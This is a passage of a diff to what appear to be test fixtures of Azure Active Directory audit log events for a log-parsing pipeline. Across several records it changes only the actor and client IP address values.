APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -1497,9 +1497,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T15:34:06",
 "ExtendedProperties": [
 {
@@ -1733,7 +1733,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 
Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"V
alue\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -1763,9 +1763,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T15:34:06",
 "ExtendedProperties": [
 {
@@ -1999,7 +1999,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464434\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"d8a2ae24-a752-4f8e-adca-c57189a76a71\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464434\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"d8a2ae24-a752-4f8e-adca-c57189a76a71\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -2029,9 +2029,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T15:34:06",
 "ExtendedProperties": [
 {
